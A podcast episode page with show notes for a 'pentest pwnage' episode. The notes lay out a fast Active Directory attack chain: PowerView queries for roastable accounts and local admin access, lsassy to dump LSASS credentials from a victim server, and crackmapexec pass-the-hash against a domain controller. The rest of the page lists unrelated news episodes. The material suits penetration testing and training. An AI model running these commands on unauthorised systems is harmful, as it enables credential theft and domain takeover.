Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence: Get a cmd.exe spun up in the context of your AD user account: runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe" Then get some important info in PowerView: Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win! Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win! Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access! Once you know where you have local admin access, lsassy is your friend: lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server Did you get an admin's NTLM hash from this dump? Then do this: crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED (Pwn3d!) FTW!
No persons identified in this episode.
This episode hasn't been transcribed yet
Help us prioritize this episode for transcription by upvoting it.
Popular episodes get transcribed faster
Other recent transcribed episodes
Transcribed and ready to explore now
NPR News: 12-08-2025 2AM EST
08 Dec 2025
NPR News Now
NPR News: 12-07-2025 11PM EST
08 Dec 2025
NPR News Now
NPR News: 12-07-2025 10PM EST
08 Dec 2025
NPR News Now
Meidas Health: AAP President Strongly Pushes Back on Hepatitis B Vaccine Changes
08 Dec 2025
The MeidasTouch Podcast
Democrat Bobby Cole Discusses Race for Texas Governor
07 Dec 2025
The MeidasTouch Podcast
Fox News Crashes Out on Air Over Trump’s Rapid Fall
07 Dec 2025
The MeidasTouch Podcast